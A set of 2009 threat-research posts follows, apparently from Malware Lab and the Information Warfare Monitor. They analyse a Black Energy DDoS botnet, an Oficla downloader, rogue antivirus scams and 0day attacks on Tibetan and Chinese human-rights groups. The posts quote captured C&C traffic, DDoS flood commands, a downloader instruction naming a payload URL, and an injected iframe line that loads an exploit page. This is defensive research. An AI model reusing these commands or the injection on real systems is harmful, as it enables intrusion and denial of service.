An automated analysis of “ R23.exe” by ThreatExpert shows that connections are issued to 091809.ru (210.51.166.238) and zflaersroot.cn (210.51.166.233) as well as core2724.openbiglibrarynow.com (94.125.90.163).6 However, the captured network traffic from the infected computer does not show any connections to core2724.openbiglibrarynow.com (94.125.90.163, IntTranspNet, RU).

Black Energy

Black Energy is a botnet toolkit and its primary functionality is Distributed Denial of Service (DDoS) attacks. The bots communicate with command and control server using the HTTP protocol. It is used by Russian hackers and Black Energy botnet kits can be purchased for about $40. There are at least 30 distinct Black Energy botnets.7 According to Arbor Networks, Black Energy botnets were used in the DDoS attack on Georgia in 2008.8

The captured network traffic from the infected computer does show a connection to 091809.ru (210.51.166.238) is a check-in:

POST /1/stat.php HTTP/1.0
Host: 091809.ru
id=x———-_382C0098&build_id=.8

HTTP/1.1 200 OK
MTA7MjAwMDsxMDsxOzI7MzA7MTAwOzM7MjA7MTAwMDsyMDAwI3dhaXQjMTAjeC0tLS0tLS0tLS1fMzgyQzAwOTg=

The response from the C&C is base64 encoded, when decoded it is:

10;2000;10;1;2;30;100;3;20;1000;2000#wait#10#x———-_382C0098

Further analysis of the Black Energy control server at 091809.ru (210.51.166.238) revealed the command interface that the attacker uses to issue commands to infected computers. According to the statistics in the interface the attackers had 2044 active bots, an average of 2418 per hour and 8105 per day. In total the attackers recorded 64346 infections.

bundle1

Further investigation revealed the command interface for another Black Energy control server on the same IP address, sexiland.ru (210.51.166.238, China Netcom) was also accessible. According to the statistics in the interface the attackers had 3623 active bots, an average of 4869 per hour and 12749 per day. In total the attackers recorded 51813 infections.

bundle2

During the investigation the attackers began a DDoS attack against “81.176.239.67” with the command:

flood http 81.176.239.67

The IP address is assigned to “Erix colocation and vps service” in Moscow, Russia and the only domain we found that resolved to this IP address is, vernem-prava.ru, which appears to be a web site selling services to obtain Russian driver’s licenses. The command was changed back to “wait” shortly thereafter.

bundle3

Several minutes later the following command was issued on both Black Energy control servers which had a total of 5387 active bots at the time.

flood http www.vernem-prava.ru index.html

We also observed both command and control servers issues addition DDoS commands:

flood http besticq.ru
flood http www.newkaliningrad.ru forum
flood http wepn.ru
flood http 212.112.224.168

(The version of Black Energy running on these servers appears to be 1.7 as new files introduced with Black Energy 1.8 do not appear on these servers.9)

Oficla/Sasfis

After the connection to 091809.ru, there was a connection to zflaersroot.cn (210.51.166.233) where the infected computer is directed to download “bot.exe” from moneybizness.ru (210.51.10.184):

GET /tmp/bb.php?id=912030164&v=200&tm=21&b=DDOS1 HTTP/1.1
Host: zflaersroot.cn

HTTP/1.1 200 OK
[info]runurl:http://moneybizness.ru/bot.exe|taskid:43|delay:30|upd:0|backurls:[/info]

An automated analysis of “bot.exe” shows that it connects to 091809.ru (210.51.166.238).10 Follow-up requests to zflaersroot.cn (210.51.166.233) instructed the infected computer to “delay.”

GET /tmp/bb.php?id=912030164&v=200&tm=21&b=DDOS1&tid=43&r=1 HTTP/1.1
Host: zflaersroot.cn

HTTP/1.1 200 OK
[info]kill:0|delay:30|upd:0|backurls:[/info]

This behaviour is identical to Win32/Oficla, a trojan downloader.11 In this case the Oficla download instructs the infected computer to download “bot.exe” which connect to the Black Energy control server.

Rogue AV’s

The malware file “R23.exe,” which the original infected computer downloaded from sexigood.ru (81.176.232.103), connected to to 091809.ru (210.51.166.238), the Black Energy control server, zflaersroot.cn (210.51.166.233), the Oficla/Sasfis control server, as well as a URL associated with rogue/fake antivirus software.12

hxxp://core2724.openbiglibrarynow.com/stat/action3.cgi?p=1&a=2724
hxxp://core2724.openbiglibrarynow.com/stat/action3.cgi?p=3&a=2724
hxxp://core2724.openbiglibrarynow.com/stget2.cgi?host=host&id=2724

In fact, there were additional malware files in the same directory as “R23.exe” on sexigood.ru (81.176.232.103) including “8.exe,”13 “R31.exe”14 and “Windows_Protector.exe.”15 An analysis of “ Windows_Protector.exe” showed that it downloaded another files named “PC_protect.exe” from core2724.openbiglibrarynow.com (95.211.26.5, NL-LEASEWEB, NL).16

This URL was found in hxxp://scanyourpc-fastx.com/pdm/x.exe “ Windows_Protector.exe.” The “x.exe”17 from scanyourpc-fastx.com (89.208.41.253, DINETHOSTING, RU) file connects to d45648675.cn (91.212.226.60) and begins an SSL encrypted session.
The files that were on sexigood.ru (81.176.232.103) were replaced with “Bee.dll,”18 “ked.exe,”19 “win2ext.exe,”20 and “Windows_Protector.exe.”21 The “win2ext.exe” file connected to www.guruman.cn (210.51.181.69, E-Icann, China Netcom, CN) and perenils.cn (91.212.220.143, Group Vertical Ltd, RU).

“rundll32″

There were some connections, which appeared to be unrelated to the malware analyzed above, requesting “/toolbarprofit/images/body_bg_bot.jpg” from the IP address “66.197.149.41” (Network Operations Center Inc., US) with the host header “www.pay-per-install.info.” These connections are redirected “www.fbi.gov.” Software that connects to the IP address, “66.197.149.41,” is under review by PrevX.22

GET /toolbarprofit/images/body_bg_bot.jpg HTTP/1.0
Referer: http://www.pay-per-install.info/
Host: www.pay-per-install.info

HTTP/1.1 301 Moved Permanently
Server: nginx
Location: http://www.fbi.gov/

The domain “www.pay-per-install.info” resolves to “127.0.0.1” and is an alias for “ddos.fuckingtest.net.”

$ host www.pay-per-install.info
www.pay-per-install.info is an alias for ddos.fuckingtest.net.
ddos.fuckingtest.net has address 127.0.0.1

Searches focused on “toolbarprofit” yielded an individual known as “rundll32” using the email address “toolbarprofit@gmail.com” and the ICQ number “561194042.”

bundle4

There is a post by “rundll32” that advertises an “affiliate” program that is “not detected by any antivirus.” In this post “rundll32” advertizes the ICQ number “551802661” and the website “rundll32.ru.” The same text has been posted on a variety of Russian hacker forums.23

bundle5

While rundll32.ru resolves to 95.211.27.177 (NL-LEASEWEB, NL), www.rundll32.ru exhibits the same behaviour as www.pay-per-install.info:

$ host www.rundll32.ru
www.rundll32.ru is an alias for ddos.fuckingtest.net.
ddos.fuckingtest.net has address 127.0.0.1

Our investigation then focused on the email address, “rundll32@yandex.ru”, which was used to register rundll32.ru. A search for “rundll32@yandex.ru” returns a paper written by Alexander V. Prokhorov (or Prochorov), a student at Moscow State University, Russia.

bundle6

The same search also returned a server that is being used for spam as well as iframe injection. In fact, “rundll32@yandex.ru” appears on a large spam list of 4,288,450 email addresses. There were a variety of templates as well as tools for sending spam located on the server across the following domains al of which are hosted on the same IP address (216.120.237.31, HostRocket Web Services, US): burkecoaching.com rentaplayer.com snowdomain.com solutionmgmt.com syattenterprises.com trailingfirecards.com noc8.com and strategymanagementinc.com.

bundle7

bundle8

In addition, we found a variety of redirects to various pornography sites as well as a pharmaceutical site, drugstopzap.com, and rogue AV sites. For example, the site, hxxp://destinybeijing.cn/?pid=156&sid=3f9ecd, redirects to hxxp://detect-spyware7.com/scan1/?pid=156&engine=pHT43Tj4NjEwMC4yMjkuNTYmdGltZT0xMjUuNYIMPAZM where the user is forced to download rogue AV software.24

bundle9

bundle10

bundle11

We also found that some pages redirected users to “counterweb.cn” which is hosted on the same IP address, 210.51.166.238 (China Netcom, CN) as the Black Energy command and control servers 091809.ru and sexiland.ru. The connections to counterweb.cn:

GET /t/out.php HTTP/1.1
Host: counterweb.cn
Referer: http://strategymanagementinc.com/uczqy/

HTTP/1.x 302 Found
Location: http://counterweb.cn/sutra/in.cgi?default

GET /sutra/in.cgi?default HTTP/1.1
Host: counterweb.cn
Referer: http://strategymanagementinc.com/uczqy/

HTTP/1.x 302 Found
Location: http://counterweb.cn/sutra/in.cgi?2

GET /sutra/in.cgi?2 HTTP/1.1
Host: counterweb.cn
Referer: http://strategymanagementinc.com/uczqy/

HTTP/1.x 302 Found
Location: http://google.com

We also found a variety of malicious javascript and iframes that loaded the following URLs:

hxxp://000007.ru/in.cgi?7 (92.241.177.223, NETPLACE, RU)
hxxp://javascrlpt.com/s/in.cgi?8
hxxp://newsmeta.net/s/in.cgi?8 (213.163.89.35, Telos Solutions, NL)
hxxp://veryblomar.com/vb/in.cgi?2 (69.64.155.121, eNom, US)

The domain, 000007.ru has been hosting “Windows_Protector.exe” which is the rogue AV we also found on sexigood.ru (81.176.232.103).25 The domain, javascrlpt.com was found serving Zeus related binaries from a Chinese IP address.26 All these domain names appear to have been used in iframe injection attacks.

Additional searches reveal web sites that contained similar scripts and tools as those used on the domains listed above including dark-studio.by.ru, erre-way.by.ru and www.exterv.com.

Storm

There was another connection of interest in our packet capture sample to “78.159.121.122” (NETDIRECT-NET, DE) which is very similar to the connection between a Storm “supernode” and a “subcontroler” as described by SecureWorks’ Joe Stewart.29

POST /u/ HTTP/1.0
Content-Type: application/x-www-form-urlencoded
User-Agent: Internet Explorer
Host: 78.159.121.122
Content-Length: 712
Pragma: no-cache

a=ZYCmeXPQwHEj9qGWsUqvzJf0nNCYaVvxlGKWOu3H4Gr[...]&b=RlzWZPqmoRdB1XyjNGfn1GC3n5KdXpmROtMz33ItiXrNIJyw[...]

HTTP/1.1 200 OK
Date: Tue, 13 Oct 2009 08:30:16 GMT
Server: Apache/2.2.11 (FreeBSD) PHP/5.2.9 with Suhosin-Patch
X-Powered-By: PHP/5.2.9
Content-Length: 28
Connection: close
Content-Type: text/html

#���(NöÎ(5ëÊ9J#!švÝôÐpo°à¢Ëµ

According to Joe Stewart the “master” control server is often protected by another nginx server. However, the server on 78.159.121.122 appears to be Apache.

It is unclear if this is related to the malware “bundle” described in this post.

Notes

1 http://www.darkreading.com/security/management/showArticle.jhtml?articleID=211201241

2 http://ddanchev.blogspot.com/2009/11/pricing-scheme-for-ddos-extortion.html

3 http://ddanchev.blogspot.com/2009/11/pricing-scheme-for-ddos-extortion.html

4 http://blog.fireeye.com/research/2009/11/killing-the-beastpart-4.html

5 http://www.blogcatalog.com/blog/threatfire-research-blog/56298e2ced094ff86574560566e158a1

6 http://www.virustotal.com/analisis/46841255cd4e91cf93c74c539c13cf57beea6ec33c0c6502c2d14fb7182ce7ef-1256048818 and http://www.threatexpert.com/report.aspx?md5=6de4aeaca08b57339e2890a35c84a968

7 http://atlas-public.ec2.arbor.net/docs/BlackEnergy+DDoS+Bot+Analysis.pdf

8 http://asert.arbornetworks.com/2009/01/russia-opposition-websites-and-ddos/

9 http://malerisch.net/docs/black_energy_ddos_1_8/blackenergy18.ppt

10 http://www.threatexpert.com/report.aspx?md5=78919f875e9cea75a491b8d620453d1b and http://www.virustotal.com/analisis/69ed9c0fdb9a0ac4631acba396cd22569a4670965017b6903cef050c63eaa0d6-1256051615

11 http://www.malwareurl.com/search.php?domain=&s=Oficla&match=0&rp=50&urls=on&redirs=on&ip=on&reverse=on&as=on and http://www.threatexpert.com/report.aspx?md5=8ba3f334d7c840c08317eed8274478d2

12 http://www.malwaredomainlist.com/mdl.php?search=openbiglibrarynow.com

13 http://www.virustotal.com/analisis/d32c1247b9cc80db7c50bd0b91d3a4d523672e9c238f99e1972b75d04340ab88-1255645683 and http://www.threatexpert.com/report.aspx?md5=0d431ffb676be2c091eda0445282b59e

14 http://www.virustotal.com/analisis/8e0df4b3e31afd1e73d68bdf7bb3f35c61d9d12cf35c0d36a8b0d98459b88b40-1255645829 and http://www.threatexpert.com/report.aspx?md5=4672d5000ea2ed47ff7089666bf18186

15 http://www.virustotal.com/analisis/23f064ca6f2c661899a0e227735b993c05186cfdc1abdc0c9e884661159d97a9-1255652491 and http://www.threatexpert.com/report.aspx?md5=43ec3ee7742dc809dc2690508b111ddf

16 The IP address changed.

17 http://www.virustotal.com/analisis/9d8ea6a2706f4a12c0fa78185811f31a9a64984d7f37667f73b7b5fba345a281-1256064976 and http://www.threatexpert.com/report.aspx?md5=18a5036b5855f40f8bf1bc37e7712115

18 http://www.virustotal.com/analisis/ab462e64ee3b87ef775ebd361e2290d02544aeb3df91c132a69c8cc3c7737d46-1256065684

19 http://www.virustotal.com/analisis/863f9a65b9496ce991a6a4d7d0cfd6260b290a59e16e14eab64ce2ac1a80836d-1256065745

20 http://www.virustotal.com/analisis/3cd06a2911f0b9e98b50dcb1148b7d12743a17b0c30ae707d240ba36b6f0e043-1256005930 and http://www.threatexpert.com/report.aspx?md5=7d73fe4a05fbc21a32fa620d92587102

21 http://www.virustotal.com/analisis/23f064ca6f2c661899a0e227735b993c05186cfdc1abdc0c9e884661159d97a9-1256016137

22 http://spywarefiles.prevx.com/RRDEFI44668732/ITUN~KA2.EXE.html and http://www.prevx.com/filenames/X824695795861965386-X1/LATEST5FUPDATE.EXE.html

23 http://forum.xakep.ru/m_1578962/mpage_1/key_/tm.htm#1578962 , http://74.125.95.132/search?q=cache:YeAN_Ax_3oMJ:secnull.ru/lofiversion/index.php/t2214.html+%22561194042%22&cd=10&hl=en&ct=clnk&gl=ca

24 http://www.virustotal.com/analisis/be2a26d07f7bdb14b72a1e21369744859bce7a77b820196a58c64bd4bf0c62ca-1256670552

25 http://www.malwaredomainlist.com/mdl.php?search=000007.ru

26 http://www.malwaredomainlist.com/mdl.php?search=javascrlpt.com

27 When connecting directly to the requested file, a 403 HTTP header is received, however, when connecting with “www.pay-per-install.info” as the host header the browser is redirected to www.fbi.gov.

28 http://blog.unmaskparasites.com/2009/09/11/dynamic-dns-and-botnet-of-zombie-web-servers/ and http://news.cnet.com/8301-10789_3-10040669-57.html and https://www.blackhat.com/presentations/bh-usa-08/Stewart/BH_US_08_Stewart_Protocols_of_the_Storm.pdf

29 https://www.blackhat.com/presentations/bh-usa-08/Stewart/BH_US_08_Stewart_Protocols_of_the_Storm.pdf

About Malware Lab

The Malware Lab (www.malwarelab.org) is an independent research collective comprised of volunteers that investigates and reports on politically motivated malware attacks, primarily against civil society organizations. The Malware Lab combines technical data with socio-political contextual analysis in order to better understand the capabilities and motivations of the attackers as well as the overall effects and broader implications of targeted attacks.

Rogue AV: IAV Pro



iavpro

Internet AntiVirus Pro is rogue anti-virus software that is uses fake scans and threats to entice users into downloading and purchasing the software. Moreover, IAV uses intermediary sites that force users to download the software. there is no easy way to uninstall the software and the IAV demonds that people pay to receive software that can uninstall the software that they never wanted in the first place. (For more about these guys read Dancho Danchev’s blog).

The “Support” form on IAV web sites stores submissions from users in a web accessible directory.

infectedhosts

The 1200+ submissions found on one server mostly focused on the inability to remove the software and that fact that they either installed it by mistake or had no idea how the software was installed.

Some are polite…

Subject: Removal
Content: Please remove this file from my system. I had run this by mistake. I already have my own antivirus. Thanks!
Country:CA

Some are not so polite…

Subject: fuck this shit
Content: get this shit off my computer, now!!!!
Country:US

Overall, people are extremely frustrated and unsure of what to do. Some seem to believe that this is a real anti virus product — some even ask if they are related to other real anti virus products. Many also indicate that they already have AV products installed.

Others recognise that it is a scam but are unable to do anything about it. Many state that it was their children that installed the software thinking they were doing their parents a favour. They also describe how it is interfering with their businesses, education and general computer usage.

What outrages people the most seems to be the fact that the rogue AV demands that you buy the software if you want to be able to uninstall it.

It is a good reminder that this stuff affects real peoples lives in a very unpleasant way.

“0day”: Civil Society and Cyber Security



by Nart Villeneuve & Greg Walton

Civil society organizations face a wide range of online security threats that they are often ill equipped to defend. The lack of both resources and training leaves many organizations vulnerable to even basic Internet-based attacks.

However, civil society organizations are being compromised by attackers using “0day” exploits – vulnerabilities for which there is no patch of “fix” available from the software vendor. Therefore, even if all the software a civil society organization is using is completely up-to-date it is still vulnerable. This results in a situation in which even organizations and individuals with reasonable levels of security are under threat.

It is difficult to determine who is behind the attacks and there may be no intent to target civil society specifically. Perhaps using a human rights themed email in a social engineering attack might just be a convenient way to get peoples’ attention and compromise computer systems. Moreover, it remains unclear if the attackers were able to acquire 0day exploits before they became public, or if they simply quickly leveraged after they became publicly available and before there was a vendor supplied security patch.

Therefore, in this post we explore cases in which there is a some form of relationship between 0day exploits and their use against civil society organizations in an effort to understand the effect of these attacks given the difficult nature of attribution.

In this investigation we discovered that a well known site, 64tianwang.com, had been compromised and was propagating 0day exploits. Moreover, we found similar attacks specifically targeting the Tibetan community.1 The second case used the high profile case of Tibetan filmmaker Dhondup Wangchen as bait. These attacks were so successful that Reporters Without Borders unknowingly propagated a link to a malicious website posing as a Facebook petition to release Dhondup Wangchen.

Summary

  • Civil society organizations are compromised and used as vehicles to deliver 0day exploits
  • Attackers have access to multiple 0day exploits and switch their attacks to leverage newer exploits as they become available
  • Attackers leverage human rights issues as the context for malware distribution
  • The attacks are effective; civil society organizations continue to propagate malicious links within their communities without realizing it.

Background

There is a wealth of information studying 0day malware attacks emanating from locations such as Russia and China. These reports document the ability of the attackers to leverage 0day exploits in their attacks:

One of the most striking features of these attacks is how quickly they adapt new exploits to their
infrastructure. Immediately after the release of a recent IE7 0day exploit, these attackers integrated the new technique into their framework.2

However, these reports do not focus on explicitly political attacks but integrate a variety of threats including fraud, acquiring gaming credentials and in general the theft of information. But the exploration of politically motivated malware attacks using 0day exploits is certainly nothing new.

Maarten Van Horenbeeck has been documenting targeted malware attacks leveled against a variety of targets including civil society organizations.3 Van Horenbeeck documented the use of what he refers to as “custom vulnerability development” as well as known attacks.4 These attacks targeted NGO’s, the Tibetan community as well as the Falun Gong movement. Van Horenbeeck’s research showed that some of the same control servers used in these types of attacks were also involved in attacks on a variety of other targets including the United States government, defense contractors and Japanese companies.5

Our own previous investigations revealed connections between 0day malware and politically motivated attacks. During the “GhostNet” investigation we found that on September 11, 2008 the Tibetan Government-in-Exile in Dharamsala, India was infected with a malware that connected back to the domain control server on 221.10.254.248 using the host name 927.bigwww.com (221.10.254.248).6 On December 10, 2008 this same domain name appeared on a list of domain names serving a 0day exploit for Internet Explorer 7 compiled by the Shadowserver Foundation.7

In addition, computers located at the Office of His Holiness the Dalai Lama (OHHDL) as well as a Tibetan NGO called Drewla had bee compromised by a malware network which used www.lookbytheway.net and www.macfeeresponse.org as control servers. This malware network is well known and has been linked to a variety of attacks including the JBIG2 buffer overflow vulnerability.8 At Drewla we also found a computer connection to a control server, dns3.westcowboy.com, that was documented by Maarten Van Horenbeeck9 as well as connections to religion.xicp.net which was reportedly serving a 0day in February 2009.10

Investigation

On 2009-07-06 ISC SANS posted a list of domain that were hosting 0day Internet Explorer exploits and 64tianwang.com was on the list.11 64tianwang.com is a well known organization set up in 1998 to help find missing persons in China, particularly victims of human trafficking. The organization expanded its mission to focus widely on human rights and had to move their website overseas after it was shut down by Chinese authorities.12 The organization’s founder, Huang Qi, was arrested several times and was imprisoned from June 2000 to June 2005. He is currently in detention awaiting trial.1314 The 64tianwang.com has previously been a target for internet-based attacks.15

An examination the source of http://www.64tianwang.com/index.htm revealed an iframe. The 64tianwang.com server was likely compromised and the malicious iframe was inserted into the legitimate content on the page. In fact, we have see “iframe attacks” affect a variety of organizations including the Foreign Correspondents’ Club of China (www.fccchina.org).16 Anyone visiting 64tianwang.com was loading a malicious page from rfsb.xicp.net:

document.write(“<iFraMe width=’0′ height=’0′ src=’hxxp://rfsb.xicp.net/css/a.htm’ frameborder=’0′>“);

The file, a.htm, contains malicious code that attempts to exploit Microsoft DirectShow.17 Anyone visiting 64tianwang.com using Internet Explorer was likely compromised.

Soon after the discovery of a new 0day exploit, this time in Microsoft Office, the attackers changed the directory used in the initial attack, “css”, to “cssbak” and began serving the Microsoft Office Web Components 0day in the “css” directory instead.18 Several versions of Microsoft Office were affected and anyone visiting this malicious page could be compromised even of their security updates were current.19

The details for the malicious website are:

Name: rfsb.xicp.net
Address: 222.223.89.17
netname: CHINANET-HE
descr: CHINANET hebei province network
descr: China Telecom
country: CN

Our investigation discovered that rfsb.xicp.net (222.223.89.17) is also hosting some phishing pages posing at login screen for a variety of Chinese or Chinese language versions of email providers including: 126, 163, 21cn, Eyou, Hanmail, Hinet, Hotmail, QQ, Sina, Sohu, Tom, and Yahoo.

“Phishing” is a terms that refers to the fraudulent use of legitimate looking website to entice a using in revealing sensitive information such as user names and passwords.20 In this case, the attacks appear to be particularly interested in compromising users on Chinese email providers.

If users attempt to login to their email account, the credentials are forwarded to various servers under the attackers’ control:

121.22.23.254
netname: UNICOM-HE
descr: China Unicom Hebei province network
descr: China Unicom
country: CN

124.237.109.234
netname: CHINANET-HE
descr: CHINANET hebei province network
descr: China Telecom
country: CN

121.22.28.29
netname: QHD-YIWANGKEJI
descr: CNC Group CHINA169 Hebei Province Network
country: CN

222.223.89.17 (17.89.223.222.broad.qh.he.dynamic.163data.com.cn)
netname: CHINANET-HE
descr: CHINANET hebei province network
descr: China Telecom
country: CN

my218.3322.org (124.236.29.71, 71.29.236.124.broad.sj.he.dynamic.163data.com.cn)
netname: CHINANET-HE
descr: CHINANET hebei province network
descr: China Telecom
country: CN

The attackers use script that directs the users to a server under the control of the attacker and then redirects the user to the legitimate mail provider.

In the case of QQ the attackers used malicious flash files that connect out to a server under the attackers control.21

Interestingly, all the IP’s are in Hebei Province.

The sub-domain rfsb.xicp.net is on a free domain service *.xicp.net run by a Chinese registrar.22

Shortly thereafter, we were alerted to another malicious domain, dump.vicp.cc, which uses the same free domain service as rfsb.xicp.net. The malicious site, dump.vicp.cc, is also on the ISC SANS list of domains serving the Internet Explorer 0day exploit along with 64tianwang.com and rfsb.xicp.net.

This domain appeared in an email that was sent to the Tibetan community. The email comes from a GMail address with the name “Tseten Samdup.” Tseten Samdup is the name of the head of the Office of Tibet in Geneva, Switzerland.23

The email forwards an article from Reporters Without Borders (RSF) on the case of Tibetan documentary filmmaker Dhondup Wangchen. In addition to the RSF text, the email contains a link to a “Petition for the Release of Tibetan Filmmaker Dhondup Wangchen” hosted on Facebook which is sponsored by Students for a Free Tibet. However, the email also contains a link to hxxp://dump.vicp.cc/groups/articles.asp?n=3 which loads the real petition along with a malicious frame.

Subject: Re: Petition for Tibetan filmmaker’s
Date: Wed, 29 Jul 2009 22:52:26 +0800
From: Tseten Samdup
To: tsetenfreetibet@gmail.com

Here is the the petition lauched by SFT.

http://apps.facebook.com/causes/petitions/26?m=bcb306a2&recruiter_id=58958974&_fb_noscript=1

They have already collected 27,660 signatures.
Please sign your name if you have not.

Tseden Samdup

> ———- Forwarded message ———-
> From: RSF ASIA
> Date: Wed, Jul 29, 2009 at 8:05 AM
> Subject: Petition for Tibetan filmmaker’s
> To: tsetenfreetibet@gmail.com
>
>
> Reporters Without Borders/Reporters sans frontières
>
> 29 July 2009
>
> CHINA – TIBET
> More than 13,000 signatures on petition for Tibetan filmmaker’s release
> http://www.rsf.org/More-than-13-000-signatures-on.html
>
> Reporters Without Borders has given the Chinese authorities a petition
> calling for the release of Tibetan documentary filmmaker Dhondup Wangchen,
> who has been held since 23 March 2008 and is seriously ill with hepatitis B,
> which is not being properly treated. According to recent reports, he is now
> in a prison in Xining, the capital of Qinghai (a province adjoining Tibet).
>
> At the time of his arrest, Wangchen was completing a documentary about Tibet
> that was shown to foreign journalists in Beijing during the Olympic Games.
> He may be tried on charges of “separatism”.
>
> “There is an urgent need for the competent authorities to heed the appeal
> made by thousands of citizens around the world on behalf of a man whose only
> crime was to have filmed interviews,” Reporters Without Borders said. “The
> government should take account of Dhondup Wangchen’s state of health and
> free him on humanitarian grounds.”
>
> Reporters Without Borders handed in the petition today to the Chinese
> embassy in Paris. It was signed by 13,941 people, who included Tibetans,
> Indians, westerners, and eight Australian parliamentarians. Wangchen’s wife,
> Lhamo Tso, who is a refugee in northern India, collected several thousand
> signatures with the help of the Tibet Post (www.thetibetpost.com).
>
> See Lhamo Tso’s campaign video:
> http://www.dailymotion.com/relevance/search/Dhondup+Wangchen/video/x9zgcf_petition-pour-la-liberation-de-dhon_news
>
> Li Dunyong, a Chinese lawyer hired by the family to defend Wangchen, is
> meanwhile being denied access to him. Li has allowed to see him only once
> since the start of the year in April. Like many human rights lawyers in
> China, he is being harassed by the government, which is threatening to
> rescind his licence if he does not drop the case.
> Vincent Brossel
> Asia-Pacific Desk
> Reporters Without Borders
> 33 1 44 83 84 70
> asia@rsf.org

The second link, hxxp://dump.vicp.cc/groups/articles.asp?n=3, is a malicious link that loads the petition but has another frame (hxxp://dump.vicp.cc/groups/ie.html) that loads a 0day exploit for Adobe Flash.24

This page loads “xp.swf” and drops “zjss.exe” onto the system which attempts to connect to pop.lovenickel.com (66.36.242.59) on port 8080 (there is not currently anything running on 8080). (This same domain was used in a 2006 0day for Japanese word processing software).25

Also hosted in this sites is another page (hxxp://dump.vicp.cc/cach/news.asp?n=1) that uses http://www.leavingfearbehind.com as the bait. This is the website for the film “Leaving Fear Behind.” Dhondup Wangchen is director of the film.

In addition to loading the legitimate website, this link has another frame (hxxp://dump.vicp.cc/cach/error_01.htm) that loads the Microsoft Office Web Components 0day exploit.

The IP address for dump.vicp.cc 210.56.60.132 which is assigned to:

netname: SUN-NETWORK
descr: Sun Network (Hong Kong) Limited
descr: Internet Service Provider in Hong Kong
country: HK

Our investigation found that a malicious link also using www.leavingfearbehind.com as bait was posted in the comment section of BoingBoing on a post about the Uighur crisis.

In addition to an email that was released by Reporters Without Borders (RSF) a web page was also setup on the RSF web site that highlighted the fact that more than 13,000 people signed a petition to release Dhondup Wangchen. However, the page on the RSF web site contained the same link from the malicious email that included both the legitimate Facebook petition by Students for a Free Tibet as well as the malicious link to dump.vicp.cc.26

RSF promptly removed the malicious link after being alerted.

Conclusion

Our findings indicate that civil society organizations are compromised and used as vehicles to deliver 0day exploits to others (e.g. via malicious iframe inserted into a legitimate site). This means that (vulnerable) visitors to the site – many of whom may be staff and supporters of the specific organization – are likely to be compromised.

We have noticed that the attackers have access to multiple 0day exploits and switch their attacks to leverage newer exploits as they become available. While it remains unclear if the attackers were able to acquire these exploits before they became public, the fact that they are able to leverage 0day exploits quickly suggests that the attackers are closely monitoring their operations and have the capacity to adapt when necessary.

The attackers leverage human rights issues as the context for malware distribution in what are commonly called “social engineering” attacks. They will often send malicious emails to members, supporters and affiliates of civil society organizations. These emails are contextually relevant to the target organizations and contain a malicious attachment or link to a malicious site. The computer of the recipient will be compromised if he or she opens the attachment or visits the malicious website.

These attacks are effective. While it is difficult to determine the rate of successful exploitation, we often discover compromised computers at civil society organizations. Moreover, some of these social engineering attacks are so successful that civil society organizations continue to propagate malicious links within their communities without realizing it.

However, the murky questions of intent of the attackers as well responsibility for the attacks remain unclear. One could argue that the attacks are somewhat coincidental. The civil society organizations may just be running vulnerable software that was (automatically) exploited and used just like any other random target as a vehicle to propagate malware through the insertion of a malicious iframe. That is, there is no intent to target civil society specifically. Similarly, using a human rights themed email to in a social engineering attack might just be a convenient way to get peoples’ attention; it is not about targeting civil society per se, just that human rights is an appealing topic and people might more easily enticed to click on such a link.

An alternative explanation is that attackers are intent on targeting civil society and are developing and/or have access to 0day exploits that they actively deploy. There have been consistent reports of attacks against civil society and we are noticing an increasing level of contextual relevance in these attacks. Malicious emails appear to come from email accounts with legitimate names and contact information that are known to the targets. The text of the emails contain less spelling and grammatical errors and exploit legitimate email and petition campaigns. The level of specificity and intentionality exceeds the threshold for a group of attackers that simply wants to infect as many hosts as possible. On the contrary, these attacks actually may limit the total number of hosts but provide the attackers with politically sensitive hosts.

While we have no definitive answers concerning those behind these attacks, the result of using 0day exploits against civil society is that the exploitation rate is high. Moreover, the effect is that the community is being subjected to a form of intimidation and exploitation whether the attacks are intentional or not.

About IWM

The Information Warfare Monitor (www.infowar-monitor.net) is an advanced research activity tracking the emergence of cyberspace as a strategic domain. The IWM is public-private venture between two Canadian institutions: the Citizen Lab at the Munk Centre for International Studies, University of Toronto and The SecDev Group, an operational think tank based in a Ottawa (Canada).

About Malware Lab

The Malware Lab (www.malwarelab.org) is an independent research collective comprised of volunteers that investigates and reports on politically motivated malware attacks, primarily against civil society organizations. The Malware Lab combines technical data with socio-political contextual analysis in order to better understand the capabilities and motivations of the attackers as well as the overall effects and broader implications of targeted attacks.

Notes

1 To be clear, these attacks represent the use of malware by a wide variety of attackers and are not specifically linked to one another. They are included together as part of our analysis of the 0day threat that civil society organizations face.

2 http://www.blackhat.com/presentations/bh-dc-09/ValSmith/BlackHat-DC-09-valsmith-colin-Dissecting-Web-Attacks.pdf

3 http://www.daemon.be/maarten/Crouching_Powerpoint_Hidden_Trojan_24C3.pdf

4 http://isc.sans.org/presentations/SANSFIRE2008-Is_Troy_Burning_Vanhorenbeeck.pdf

5 http://isc.sans.org/presentations/SANSFIRE2008-Is_Troy_Burning_Vanhorenbeeck.pdf

6 http://www.scribd.com/doc/13731776/Tracking-GhostNet-Investigating-a-Cyber-Espionage-Network

7 http://www.shadowserver.org/wiki/pmwiki.php/Calendar/20081210

8 http://www.shadowserver.org/wiki/pmwiki.php/Calendar/20090219

9 http://isc.sans.org/diary.html?storyid=4177

10 http://www.malwaredomainlist.com/forums/index.php?topic=2564.0

11 http://isc.sans.org/diary.html?storyid=6739&rss

12 http://www.nytimes.com/2008/07/11/world/asia/11china.html?th=&emc=th&pagewanted=all

13 http://www.hrichina.org/public/contents/press?revision_id=147917&item_id=56408

14 http://www.amnesty.org/en/library/asset/ASA17/040/2009/en/9ede45c2-3943-4a5b-b75b-7ef68fb6d787/asa170402009en.html

15 http://www.ifex.org/china/2007/07/23/hackers_block_access_to_human_rights/

16 The FCCC’s WordPress installation was compromised and malicious iframes were inserted which loaded hxxp://www.nontopworld.com/homepage.htm and hxxp//http://www.nontopworld.com/mainpage.htm.

17 http://isc.sans.org/diary.html?storyid=6733

18 http://blog.fireeye.com/research/2009/07/who-is-exploiting-office-web-components-0day.html

19 http://blogs.technet.com/srd/archive/2009/07/13/more-information-about-the-office-web-components-activex-vulnerability.aspx

20 http://en.wikipedia.org/wiki/Phishing

21 http://wepawet.iseclab.org/view.php?hash=5f227eaf1e27d92a8c23e2daebbe4b2f&type=swf

22 http://domain.oray.cn/#tab=free

23 http://www.tibetoffice.ch/news/circular_oot_geneva_280308.htm

24 http://blog.fireeye.com/research/2009/07/who-is-exploiting-the-adobe-flash-0day-part-2.html

25 http://www.symantec.com/connect/blogs/justsystems-ichitaro-zero-day-used-propogate-trojan-0

26 The same page in the Google cache from a day earlier did not contain the malicious link.

